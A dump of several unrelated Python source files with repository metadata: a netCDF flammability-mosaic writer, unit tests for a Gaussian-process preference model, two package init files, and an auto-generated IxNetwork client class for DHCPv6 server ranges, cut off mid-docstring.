        x_dim = ds.createDimension("longitude", flam.shape[1])
        y_dim = ds.createDimension("latitude", flam.shape[0])

        var = ds.createVariable("time", "f8", ("time",))
        var.units = "seconds since 1970-01-01 00:00:00.0"
        var.calendar = "standard"
        var.long_name = "Time, unix time-stamp"
        var.standard_name = "time"
        var[:] = netCDF4.date2num([date], units="seconds since 1970-01-01 00:00:00.0", calendar="standard")

        var = ds.createVariable("longitude", "f8", ("longitude",))
        var.units = "degrees"
        var.long_name = "longitude"
        var.standard_name = "longitude"
        var[:] = np.linspace(lon0, lon1-res, num=x_size)

        var = ds.createVariable("latitude", "f8", ("latitude",))
        var.units = "degrees"
        var.long_name = "latitude"
        var.standard_name = "latitude"
        var[:] = np.linspace(lat0, lat1+res, num=y_size)

        var = ds.createVariable("flammability", 'f4', ("time", "latitude", "longitude"), fill_value=-9999.9)
        var.long_name = "Flammability Index"
        var.units = '%'
        var[:] = flam[None,...]

        var = ds.createVariable("anomaly", 'f4', ("time", "latitude", "longitude"), fill_value=-9999.9)
        var.long_name = "FMC Anomaly"
        var.units = '%'
        var[:] = anom[None,...]

        var = ds.createVariable("quality_mask", 'i1', ("time", "latitude", "longitude"), fill_value=0)
        var.long_name = "Quality Mask"
        var.units = 'Cat'
        var[:] = q_mask[None,...]
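A usage sketch for the mosaic packer above. The array shapes are computed with the same expressions the function uses internally, so the netCDF dimensions and the coordinate linspace calls agree; the date and output path are placeholders, and nc_metadata.json must exist in the working directory.

from datetime import datetime
import numpy as np

res = 0.005
x_size = int((154. - 113.) / res)          # same grid arithmetic as the function
y_size = int((-44. - -10.) / (-1 * res))
flam = np.zeros((y_size, x_size), dtype='f4')
anom = np.zeros((y_size, x_size), dtype='f4')
q_mask = np.ones((y_size, x_size), dtype='i1')
pack_flammability_mosaic(datetime(2020, 1, 1), flam, anom, q_mask, "flam_mosaic.nc")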
| 41.75
| 271
| 0.579698
| 1,342
| 10,521
| 4.411326
| 0.134128
| 0.021959
| 0.083446
| 0.038851
| 0.892061
| 0.887162
| 0.879054
| 0.846453
| 0.833953
| 0.821959
| 0
| 0.051461
| 0.251972
| 10,521
| 251
| 272
| 41.916335
| 0.700762
| 0
| 0
| 0.834951
| 0
| 0.004854
| 0.211197
| 0.039635
| 0
| 0
| 0
| 0
| 0
| 1
| 0.019417
| false
| 0
| 0.024272
| 0
| 0.043689
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
44c1a4cf6d4b284674a47cdbd2309b417842f7f5
| 19,069
|
py
|
Python
|
tests/model/test_binary.py
|
prefopt/prefopt
|
45f3368e44cf16664ff5427a4f643f45b800d236
|
[
"MIT"
] | 11
|
2017-12-06T16:15:35.000Z
|
2021-02-17T14:37:13.000Z
|
tests/model/test_binary.py
|
prefopt/prefopt
|
45f3368e44cf16664ff5427a4f643f45b800d236
|
[
"MIT"
] | 2
|
2017-11-21T01:26:43.000Z
|
2018-01-19T23:12:01.000Z
|
tests/model/test_binary.py
|
prefopt/prefopt
|
45f3368e44cf16664ff5427a4f643f45b800d236
|
[
"MIT"
] | 3
|
2017-11-22T17:15:49.000Z
|
2018-02-02T02:57:57.000Z
|
"""
Tests for prefopt.model.binary.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import numpy as np
import tensorflow as tf
from prefopt.acquisition.expected_improvement import preprocess_data
from prefopt.data import PreferenceDict
from prefopt.model.binary import (
    BinaryPreferenceModel,
    compute_latent,
    compute_logit,
    compute_probit,
    define_ard_lengthscale,
    define_likelihood,
    define_posterior_predictive,
    define_prior,
    encode_observations
)
def compute_rbf(X, Y=None, sigma_signal=None, sigma_noise=None,
                lengthscale=None):
    X = X / lengthscale
    XX = np.einsum('ij,ij->i', X, X)[:, np.newaxis]
    if Y is None or Y is X:
        Y = X
        YY = XX
        delta_xy = np.eye(len(X))
    else:
        Y = Y / lengthscale
        YY = np.einsum('ij,ij->i', Y, Y)
        delta_xy = 0
    XY = np.einsum('ij,kj->ik', X, Y)
    K = (XX + YY.T - 2 * XY) / 2.0
    return sigma_signal * np.exp(-K) + delta_xy * sigma_noise

def compute_posterior_predictive(X, x, f, sigma_signal, sigma_noise,
                                 lengthscale):
    N, D = X.shape
    M, E = x.shape
    assert D == E, (D, E)
    C = compute_rbf(
        X,
        sigma_signal=sigma_signal,
        sigma_noise=sigma_noise,
        lengthscale=lengthscale
    )
    k = compute_rbf(
        X,
        Y=x,
        sigma_signal=sigma_signal,
        sigma_noise=sigma_noise,
        lengthscale=lengthscale
    )
    C_inv = np.linalg.inv(C)
    c = sigma_signal + sigma_noise
    assert C_inv.shape == (N, N)
    assert k.shape == (N, M)
    mu = k.T.dot(C_inv).dot(f)
    var = c - np.diag(k.T.dot(C_inv).dot(k))
    assert mu.shape == (M,)
    assert var.shape == (M,)
    return mu, var

def compute_lengthscales(x, low, high):
    return (high - low) * (1 / (1 + np.exp(-x))) + low
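# Note on the reference helpers above (descriptive comment, not original source):
# compute_rbf evaluates sigma_signal * exp(-||x - y||^2 / (2 * lengthscale^2)),
# adding sigma_noise on the diagonal when Y is X, i.e. an RBF kernel plus
# observation noise; the einsum expansion uses ||x - y||^2 = x.x + y.y - 2 x.y.
# compute_lengthscales squashes an unconstrained value through a sigmoid into
# (low, high), the same reparameterisation the define_ard_lengthscale tests
# below check against.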
class TestHelperFunctions(tf.test.TestCase):
def test_compute_latent(self):
with self.test_session():
N = 3
f_ = tf.placeholder(tf.float32, [N])
f = np.array([2, 1, 0])
y = collections.OrderedDict([
((0, 1), 1),
((0, 2), -1),
((1, 2), 1),
])
sigma = 2.0
z = compute_latent(f_, y, sigma)
w = np.array([1, 2, 1]) / (np.sqrt(2) * sigma)
self.assertAllClose(
z.eval(feed_dict={f_: f}),
w
)
def test_compute_probit(self):
with self.test_session():
N = 3
z_ = tf.placeholder(tf.float32, [N])
z = np.array([0., 1.96, 3.], dtype=np.float32)
phi = compute_probit(z)
w = np.array([0.5, 0.9750021, 0.9986501], dtype=np.float32)
self.assertAllClose(
phi.eval(feed_dict={z_: z}),
w
)
def test_compute_logit(self):
with self.test_session():
N = 3
z_ = tf.placeholder(tf.float32, [N])
z = np.array([-5e1, 0, 1e6], dtype=np.float32)
phi = compute_logit(z)
w = np.array([0, 0.5, 1], dtype=np.float32)
self.assertAllClose(
phi.eval(feed_dict={z_: z}),
w
)
def test_encode_observations(self):
y = collections.OrderedDict([
((0, 1), 1),
((0, 2), 1),
((1, 2), -1),
])
d = encode_observations(y)
e = np.array([1, 1, 0])
self.assertAllEqual(d, e)
def test_define_ard_lengthscale_1d(self):
with self.test_session():
D = 1
low = 0.5
high = 6.2
gamma_, lengthscale = define_ard_lengthscale(D, low=low, high=high)
self.assertAllClose(
gamma_.mean().eval(),
np.zeros(D)
)
self.assertAllClose(
gamma_.variance().eval(),
np.ones(D)
)
gamma = np.zeros(D)
lengthscale_true = compute_lengthscales(
gamma,
np.array([low] * D),
np.array([high] * D)
)
self.assertAllClose(
lengthscale.eval(feed_dict={gamma_: gamma}),
lengthscale_true
)
def test_define_ard_lengthscale_2d(self):
with self.test_session():
D = 2
low = 0.5
high = 4.1
gamma_, lengthscale = define_ard_lengthscale(D, low=low, high=high)
self.assertAllClose(
gamma_.mean().eval(),
np.zeros(D)
)
self.assertAllClose(
gamma_.variance().eval(),
np.ones(D)
)
gamma = np.zeros(D)
lengthscale_true = compute_lengthscales(
gamma,
np.array([low] * D),
np.array([high] * D)
)
self.assertAllClose(
lengthscale.eval(feed_dict={gamma_: gamma}),
lengthscale_true
)
def test_define_prior_scalar_lengthscale(self):
with self.test_session():
# set up
X = np.array([
[0, 0],
[1, 0],
[0, 1],
[1, 1],
[2.3, 1.7],
])
N, D = X.shape
sigma_signal = 1.2
sigma_noise = 0.1
lengthscale = 1.2
# define prior
X_, K, f = define_prior(
N,
D,
sigma_noise=sigma_noise,
sigma_signal=sigma_signal,
lengthscale=lengthscale
)
self.assertAllClose(
K.eval(feed_dict={X_: X}),
compute_rbf(
X,
sigma_signal=sigma_signal,
sigma_noise=sigma_noise,
lengthscale=lengthscale
)
)
self.assertAllClose(
f.mean().eval(feed_dict={X_: X}),
np.zeros(N)
)
def test_define_prior_vector_lengthscale(self):
with self.test_session():
# set up
X = np.array([
[0, 0],
[1, 0],
[0, 1],
[1, 1],
[2.3, 1.7],
])
N, D = X.shape
sigma_signal = 1.2
sigma_noise = 0.1
lengthscale = np.array([1.1, 0.4], dtype=np.float32)
# define prior
X_, K, f = define_prior(
N,
D,
sigma_noise=sigma_noise,
sigma_signal=sigma_signal,
lengthscale=lengthscale
)
self.assertAllClose(
K.eval(feed_dict={X_: X}),
compute_rbf(
X,
sigma_signal=sigma_signal,
sigma_noise=sigma_noise,
lengthscale=lengthscale
)
)
self.assertAllClose(
f.mean().eval(feed_dict={X_: X}),
np.zeros(N)
)
def test_define_likelihood(self):
with self.test_session():
N = 3
f_ = tf.placeholder(tf.float32, [N])
f = np.array([2, 1, 0])
y = collections.OrderedDict([
((0, 1), 1),
((0, 2), -1),
((1, 2), 1),
])
sigma = 2.0
d = define_likelihood(f_, y, sigma, compute_logit)
z = np.array([1, 2, 1]) / (np.sqrt(2) * sigma)
phi = 1 / (1 + np.exp(-z))
self.assertAllClose(
d.mean().eval(feed_dict={f_: f}),
phi
)
def test_define_posterior_predictive_1d_simple(self):
with self.test_session():
N, D = 3, 1
sigma_signal = 0.7
sigma_noise = 1.5
lengthscale = 1.2
X_ = tf.placeholder(tf.float32, [N, D])
K_ = tf.placeholder(tf.float32, [N, N])
f_ = tf.placeholder(tf.float32, [N])
X = np.arange(N)[:, np.newaxis]
K = compute_rbf(
X,
sigma_signal=sigma_signal,
sigma_noise=sigma_noise,
lengthscale=lengthscale
)
f = np.zeros(N)
x_, mu, var = define_posterior_predictive(
X_,
K_,
f_,
sigma_signal,
sigma_noise,
lengthscale
)
base_dict = {
X_: X,
K_: K,
f_: f,
}
# single query point
x = np.array([0.5])[:, np.newaxis]
mu_true, var_true = compute_posterior_predictive(
X,
x=x,
f=f,
sigma_signal=sigma_signal,
sigma_noise=sigma_noise,
lengthscale=lengthscale
)
feed_dict = {x_: x}
feed_dict.update(base_dict)
self.assertAllClose(
var.eval(feed_dict=feed_dict),
var_true
)
self.assertAllClose(
mu.eval(feed_dict=feed_dict),
mu_true
)
# multiple query points
x = np.array([0, 1.5, 9])[:, np.newaxis]
mu_true, var_true = compute_posterior_predictive(
X,
x=x,
f=f,
sigma_signal=sigma_signal,
sigma_noise=sigma_noise,
lengthscale=lengthscale
)
feed_dict = {x_: x}
feed_dict.update(base_dict)
self.assertAllClose(
var.eval(feed_dict=feed_dict),
var_true
)
self.assertAllClose(
mu.eval(feed_dict=feed_dict),
mu_true
)
def test_define_posterior_predictive_2d_scalar_lengthscale(self):
with self.test_session():
N, D = 3, 2
sigma_signal = 3.3
sigma_noise = 1.5
lengthscale = 0.8
X_ = tf.placeholder(tf.float32, [N, D])
K_ = tf.placeholder(tf.float32, [N, N])
f_ = tf.placeholder(tf.float32, [N])
X = np.arange(N * D).reshape(N, D)
K = compute_rbf(
X,
sigma_signal=sigma_signal,
sigma_noise=sigma_noise,
lengthscale=lengthscale
)
f = np.zeros(N)
x_, mu, var = define_posterior_predictive(
X_,
K_,
f_,
sigma_signal,
sigma_noise,
lengthscale
)
base_dict = {
X_: X,
K_: K,
f_: f,
}
# single query point
x = np.array([[0.5, 2]])
mu_true, var_true = compute_posterior_predictive(
X,
x=x,
f=f,
sigma_signal=sigma_signal,
sigma_noise=sigma_noise,
lengthscale=lengthscale
)
feed_dict = {x_: x}
feed_dict.update(base_dict)
self.assertAllClose(
var.eval(feed_dict=feed_dict),
var_true
)
self.assertAllClose(
mu.eval(feed_dict=feed_dict),
mu_true
)
# multiple query points
x = np.array([
[0, 1.5],
[9.2, -3],
[17, 2]
])
mu_true, var_true = compute_posterior_predictive(
X,
x=x,
f=f,
sigma_signal=sigma_signal,
sigma_noise=sigma_noise,
lengthscale=lengthscale
)
feed_dict = {x_: x}
feed_dict.update(base_dict)
self.assertAllClose(
var.eval(feed_dict=feed_dict),
var_true
)
self.assertAllClose(
mu.eval(feed_dict=feed_dict),
mu_true
)
def test_define_posterior_predictive_2d_vector_lengthscale(self):
with self.test_session():
N, D = 3, 2
sigma_signal = 3.3
sigma_noise = 1.5
lengthscale = np.array([0.8, 2.3], dtype=np.float32)
X_ = tf.placeholder(tf.float32, [N, D])
K_ = tf.placeholder(tf.float32, [N, N])
f_ = tf.placeholder(tf.float32, [N])
X = np.arange(N * D).reshape(N, D)
K = compute_rbf(
X,
sigma_signal=sigma_signal,
sigma_noise=sigma_noise,
lengthscale=lengthscale
)
f = np.zeros(N)
x_, mu, var = define_posterior_predictive(
X_,
K_,
f_,
sigma_signal,
sigma_noise,
lengthscale
)
base_dict = {
X_: X,
K_: K,
f_: f,
}
# single query point
x = np.array([[0.5, 2]])
mu_true, var_true = compute_posterior_predictive(
X,
x=x,
f=f,
sigma_signal=sigma_signal,
sigma_noise=sigma_noise,
lengthscale=lengthscale
)
feed_dict = {x_: x}
feed_dict.update(base_dict)
self.assertAllClose(
var.eval(feed_dict=feed_dict),
var_true
)
self.assertAllClose(
mu.eval(feed_dict=feed_dict),
mu_true
)
# multiple query points
x = np.array([
[0, 1.5],
[9.2, -3],
[17, 2]
])
mu_true, var_true = compute_posterior_predictive(
X,
x=x,
f=f,
sigma_signal=sigma_signal,
sigma_noise=sigma_noise,
lengthscale=lengthscale
)
feed_dict = {x_: x}
feed_dict.update(base_dict)
self.assertAllClose(
var.eval(feed_dict=feed_dict),
var_true
)
self.assertAllClose(
mu.eval(feed_dict=feed_dict),
mu_true
)
def test_define_posterior_predictive_2d_ard_lengthscale(self):
with self.test_session():
N, D = 3, 2
sigma_signal = 3.3
sigma_noise = 1.5
lengthscale_ = tf.placeholder(tf.float32, [D])
lengthscale = np.array([0.2, 4.1])
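# Unlike the scalar/vector cases above, the lengthscale here is itself a
# placeholder fed at evaluation time, mirroring how an ARD lengthscale
# sampled at run time would be plugged in.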
X_ = tf.placeholder(tf.float32, [N, D])
K_ = tf.placeholder(tf.float32, [N, N])
f_ = tf.placeholder(tf.float32, [N])
X = np.arange(N * D).reshape(N, D)
K = compute_rbf(
X,
sigma_signal=sigma_signal,
sigma_noise=sigma_noise,
lengthscale=lengthscale
)
f = np.zeros(N)
x_, mu, var = define_posterior_predictive(
X_,
K_,
f_,
sigma_signal,
sigma_noise,
lengthscale_
)
base_dict = {
X_: X,
K_: K,
f_: f,
lengthscale_: lengthscale
}
# single query point
x = np.array([[0.5, 2]])
mu_true, var_true = compute_posterior_predictive(
X,
x=x,
f=f,
sigma_signal=sigma_signal,
sigma_noise=sigma_noise,
lengthscale=lengthscale
)
feed_dict = {x_: x}
feed_dict.update(base_dict)
self.assertAllClose(
var.eval(feed_dict=feed_dict),
var_true
)
self.assertAllClose(
mu.eval(feed_dict=feed_dict),
mu_true
)
# multiple query points
x = np.array([
[0, 1.5],
[9.2, -3],
[17, 2]
])
mu_true, var_true = compute_posterior_predictive(
X,
x=x,
f=f,
sigma_signal=sigma_signal,
sigma_noise=sigma_noise,
lengthscale=lengthscale
)
feed_dict = {x_: x}
feed_dict.update(base_dict)
self.assertAllClose(
var.eval(feed_dict=feed_dict),
var_true
)
self.assertAllClose(
mu.eval(feed_dict=feed_dict),
mu_true
)
class TestModel(tf.test.TestCase):
def test_invalid_link(self):
with self.assertRaises(ValueError):
BinaryPreferenceModel(link='foo')
def test_fit_simple_probit(self):
with self.test_session():
data = PreferenceDict()
a = (0,)
b = (1,)
c = (2,)
d = (3,)
data[a, b] = 1
data[a, c] = 1
data[c, b] = -1
data[c, d] = 1
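# These outcomes are consistent with the strict order a > b > c > d (the
# -1 label flips the (c, b) pair), so the fitted posterior means should be
# strictly decreasing over items 0..3.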
m = BinaryPreferenceModel(
n_iter=500,
n_samples=20,
link='probit'
)
X, y = preprocess_data(data)
m.fit(X, y)
mean = m.mean([a, b, c, d])
self.assertTrue(
all(m1 > m2 for m1, m2 in zip(mean, mean[1:]))
)
def test_fit_simple_logit(self):
with self.test_session():
data = PreferenceDict()
a = (0,)
b = (1,)
c = (2,)
d = (3,)
data[a, b] = 1
data[a, c] = 1
data[c, b] = -1
data[c, d] = 1
m = BinaryPreferenceModel(
n_iter=500,
n_samples=20,
link='logit'
)
X, y = preprocess_data(data)
m.fit(X, y)
mean = m.mean([a, b, c, d])
self.assertTrue(
all(m1 > m2 for m1, m2 in zip(mean, mean[1:]))
)
if __name__ == "__main__":
tf.test.main()
NodeDefender/db/data/icpe/__init__.py | CTSNE/NodeDefender | ["MIT"] | Python | 116 bytes
import NodeDefender.db.data.icpe.power
import NodeDefender.db.data.icpe.heat
import NodeDefender.db.data.icpe.event
openstack_dashboard/dashboards/project/instances/workflows/__init__.py | rackerlabs/horizon | ["Apache-2.0"] | Python | 90 bytes
from create_instance import *
from update_instance import *
from resize_instance import *
ixnetwork_restpy/testplatform/sessions/ixnetwork/vport/protocolstack/dhcpv6serverrange_0d95209617577bbee08b582a2b244a49.py | OpenIxia/ixnetwork_restpy | ["MIT"] | Python | 64,360 bytes
# MIT LICENSE
#
# Copyright 1997 - 2020 by IXIA Keysight
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from ixnetwork_restpy.base import Base
from ixnetwork_restpy.files import Files
from typing import List, Any, Union
class Dhcpv6ServerRange(Base):
"""Manages a range of IP addresses that are configured using DHCP protocol.
The Dhcpv6ServerRange class encapsulates a list of dhcpv6ServerRange resources that are managed by the user.
A list of resources can be retrieved from the server using the Dhcpv6ServerRange.find() method.
The list can be managed by using the Dhcpv6ServerRange.add() and Dhcpv6ServerRange.remove() methods.
"""
__slots__ = ()
_SDM_NAME = 'dhcpv6ServerRange'
_SDM_ATT_MAP = {
'DnsDomain': 'dnsDomain',
'Enabled': 'enabled',
'IpAddress': 'ipAddress',
'IpDns1': 'ipDns1',
'IpDns2': 'ipDns2',
'IpPrefix': 'ipPrefix',
'IpType': 'ipType',
'Name': 'name',
'ObjectId': 'objectId',
'UseRapidCommit': 'useRapidCommit',
}
_SDM_ENUM_MAP = {
}
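# _SDM_ATT_MAP translates the Pythonic property names used in this class
# into the camelCase attribute names the server-side data model expects.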
def __init__(self, parent, list_op=False):
super(Dhcpv6ServerRange, self).__init__(parent, list_op)
@property
def DnsDomain(self):
# type: () -> str
"""
Returns
-------
- str: The domain name to be searched during name resolution advertised in DHCP Offer and Reply messages.
"""
return self._get_attribute(self._SDM_ATT_MAP['DnsDomain'])
@DnsDomain.setter
def DnsDomain(self, value):
# type: (str) -> None
self._set_attribute(self._SDM_ATT_MAP['DnsDomain'], value)
@property
def Enabled(self):
# type: () -> bool
"""
Returns
-------
- bool: Disabled ranges won't be configured or validated.
"""
return self._get_attribute(self._SDM_ATT_MAP['Enabled'])
@Enabled.setter
def Enabled(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP['Enabled'], value)
@property
def IpAddress(self):
# type: () -> str
"""
Returns
-------
- str: The first IP address allocated by this address pool. The rest of addresses will be sequentially allocated.
"""
return self._get_attribute(self._SDM_ATT_MAP['IpAddress'])
@IpAddress.setter
def IpAddress(self, value):
# type: (str) -> None
self._set_attribute(self._SDM_ATT_MAP['IpAddress'], value)
@property
def IpDns1(self):
# type: () -> str
"""
Returns
-------
- str: The first DNS address advertised in DHCP Offer and Reply messages.
"""
return self._get_attribute(self._SDM_ATT_MAP['IpDns1'])
@IpDns1.setter
def IpDns1(self, value):
# type: (str) -> None
self._set_attribute(self._SDM_ATT_MAP['IpDns1'], value)
@property
def IpDns2(self):
# type: () -> str
"""
Returns
-------
- str: The second DNS address advertised in DHCP Offer and Reply messages.
"""
return self._get_attribute(self._SDM_ATT_MAP['IpDns2'])
@IpDns2.setter
def IpDns2(self, value):
# type: (str) -> None
self._set_attribute(self._SDM_ATT_MAP['IpDns2'], value)
@property
def IpPrefix(self):
# type: () -> int
"""
Returns
-------
- number: The Subnet Prefix length advertised in DHCPv6PD Offer and Reply messages.
"""
return self._get_attribute(self._SDM_ATT_MAP['IpPrefix'])
@IpPrefix.setter
def IpPrefix(self, value):
# type: (int) -> None
self._set_attribute(self._SDM_ATT_MAP['IpPrefix'], value)
@property
def IpType(self):
# type: () -> str
"""
Returns
-------
- str: Defines the version of IP address style to be used for describing the range.
"""
return self._get_attribute(self._SDM_ATT_MAP['IpType'])
@IpType.setter
def IpType(self, value):
# type: (str) -> None
self._set_attribute(self._SDM_ATT_MAP['IpType'], value)
@property
def Name(self):
# type: () -> str
"""
Returns
-------
- str: Name of range
"""
return self._get_attribute(self._SDM_ATT_MAP['Name'])
@Name.setter
def Name(self, value):
# type: (str) -> None
self._set_attribute(self._SDM_ATT_MAP['Name'], value)
@property
def ObjectId(self):
# type: () -> str
"""
Returns
-------
- str: Unique identifier for this object
"""
return self._get_attribute(self._SDM_ATT_MAP['ObjectId'])
@property
def UseRapidCommit(self):
# type: () -> bool
"""
Returns
-------
- bool: Enables DHCP server to negotiate leases with rapid commit.
"""
return self._get_attribute(self._SDM_ATT_MAP['UseRapidCommit'])
@UseRapidCommit.setter
def UseRapidCommit(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP['UseRapidCommit'], value)
def update(self, DnsDomain=None, Enabled=None, IpAddress=None, IpDns1=None, IpDns2=None, IpPrefix=None, IpType=None, Name=None, UseRapidCommit=None):
# type: (str, bool, str, str, str, int, str, str, bool) -> Dhcpv6ServerRange
"""Updates dhcpv6ServerRange resource on the server.
Args
----
- DnsDomain (str): The domain name to be searched during name resolution advertised in DHCP Offer and Reply messages.
- Enabled (bool): Disabled ranges won't be configured or validated.
- IpAddress (str): The first IP address allocated by this address pool. The rest of addresses will be sequentially allocated.
- IpDns1 (str): The first DNS address advertised in DHCP Offer and Reply messages.
- IpDns2 (str): The second DNS address advertised in DHCP Offer and Reply messages.
- IpPrefix (number): The Subnet Prefix length advertised in DHCPv6PD Offer and Reply messages.
- IpType (str): Defines the version of IP address style to be used for describing the range.
- Name (str): Name of range
- UseRapidCommit (bool): Enables DHCP server to negotiate leases with rapid commit.
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
return self._update(self._map_locals(self._SDM_ATT_MAP, locals()))
def add(self, DnsDomain=None, Enabled=None, IpAddress=None, IpDns1=None, IpDns2=None, IpPrefix=None, IpType=None, Name=None, UseRapidCommit=None):
# type: (str, bool, str, str, str, int, str, str, bool) -> Dhcpv6ServerRange
"""Adds a new dhcpv6ServerRange resource on the server and adds it to the container.
Args
----
- DnsDomain (str): The domain name to be searched during name resolution advertised in DHCP Offer and Reply messages.
- Enabled (bool): Disabled ranges won't be configured or validated.
- IpAddress (str): The first IP address allocated by this address pool. The rest of addresses will be sequentially allocated.
- IpDns1 (str): The first DNS address advertised in DHCP Offer and Reply messages.
- IpDns2 (str): The second DNS address advertised in DHCP Offer and Reply messages.
- IpPrefix (number): The Subnet Prefix length advertised in DHCPv6PD Offer and Reply messages.
- IpType (str): Defines the version of IP address style to be used for describing the range.
- Name (str): Name of range
- UseRapidCommit (bool): Enables DHCP server to negotiate leases with rapid commit.
Returns
-------
- self: This instance with all currently retrieved dhcpv6ServerRange resources using find and the newly added dhcpv6ServerRange resources available through an iterator or index
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
return self._create(self._map_locals(self._SDM_ATT_MAP, locals()))
def remove(self):
"""Deletes all the contained dhcpv6ServerRange resources in this instance from the server.
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
self._delete()
def find(self, DnsDomain=None, Enabled=None, IpAddress=None, IpDns1=None, IpDns2=None, IpPrefix=None, IpType=None, Name=None, ObjectId=None, UseRapidCommit=None):
# type: (str, bool, str, str, str, int, str, str, str, bool) -> Dhcpv6ServerRange
"""Finds and retrieves dhcpv6ServerRange resources from the server.
All named parameters are evaluated on the server using regex. The named parameters can be used to selectively retrieve dhcpv6ServerRange resources from the server.
To retrieve an exact match, ensure the parameter value starts with ^ and ends with $.
By default the find method takes no parameters and will retrieve all dhcpv6ServerRange resources from the server.
Args
----
- DnsDomain (str): The domain name to be searched during name resolution advertised in DHCP Offer and Reply messages.
- Enabled (bool): Disabled ranges won't be configured or validated.
- IpAddress (str): The first IP address allocated by this address pool. The rest of addresses will be sequentially allocated.
- IpDns1 (str): The first DNS address advertised in DHCP Offer and Reply messages.
- IpDns2 (str): The second DNS address advertised in DHCP Offer and Reply messages.
- IpPrefix (number): The Subnet Prefix length advertised in DHCPv6PD Offer and Reply messages.
- IpType (str): Defines the version of IP address style to be used for describing the range.
- Name (str): Name of range
- ObjectId (str): Unique identifier for this object
- UseRapidCommit (bool): Enables DHCP server to negotiate leases with rapid commit.
Returns
-------
- self: This instance with matching dhcpv6ServerRange resources retrieved from the server available through an iterator or index
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
return self._select(self._map_locals(self._SDM_ATT_MAP, locals()))
def read(self, href):
"""Retrieves a single instance of dhcpv6ServerRange data from the server.
Args
----
- href (str): An href to the instance to be retrieved
Returns
-------
- self: This instance with the dhcpv6ServerRange resources from the server available through an iterator or index
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
return self._read(href)
def CustomProtocolStack(self, *args, **kwargs):
# type: (*Any, **Any) -> None
"""Executes the customProtocolStack operation on the server.
Create custom protocol stack under /vport/protocolStack
customProtocolStack(Arg2=list, Arg3=enum, async_operation=bool)
---------------------------------------------------------------
- Arg2 (list(str)): List of plugin types to be added in the new custom stack
- Arg3 (str(kAppend | kMerge | kOverwrite)): Append, merge or overwrite existing protocol stack
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self }
for i, arg in enumerate(args): payload['Arg%s' % (i + 2)] = arg
for key, value in kwargs.items(): payload[key] = value
return self._execute('customProtocolStack', payload=payload, response_object=None)
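# For illustration (the plugin name is hypothetical): a call such as
# CustomProtocolStack(['myPlugin'], 'kAppend') is packed as
# {"Arg1": self, "Arg2": ['myPlugin'], "Arg3": 'kAppend'} before dispatch.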
def DisableProtocolStack(self, *args, **kwargs):
# type: (*Any, **Any) -> Union[str, None]
"""Executes the disableProtocolStack operation on the server.
Disable a protocol under protocolStack using the class name
disableProtocolStack(Arg2=string, async_operation=bool)string
-------------------------------------------------------------
- Arg2 (str): Protocol class name to disable
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
- Returns str: Status of the exec
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self.href }
for i, arg in enumerate(args): payload['Arg%s' % (i + 2)] = arg
for key, value in kwargs.items(): payload[key] = value
return self._execute('disableProtocolStack', payload=payload, response_object=None)
def EnableProtocolStack(self, *args, **kwargs):
# type: (*Any, **Any) -> Union[str, None]
"""Executes the enableProtocolStack operation on the server.
Enable a protocol under protocolStack using the class name
enableProtocolStack(Arg2=string, async_operation=bool)string
------------------------------------------------------------
- Arg2 (str): Protocol class name to enable
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
- Returns str: Status of the exec
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self.href }
for i, arg in enumerate(args): payload['Arg%s' % (i + 2)] = arg
for key, value in kwargs.items(): payload[key] = value
return self._execute('enableProtocolStack', payload=payload, response_object=None)
def Start(self, *args, **kwargs):
# type: (*Any, **Any) -> None
"""Executes the start operation on the server.
Negotiate sessions for all protocols on all ranges belonging to selected plugins
The IxNetwork model allows multiple method signatures with the same name while Python does not.
start(async_operation=bool)
---------------------------
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
start(Arg2=enum, async_operation=bool)
--------------------------------------
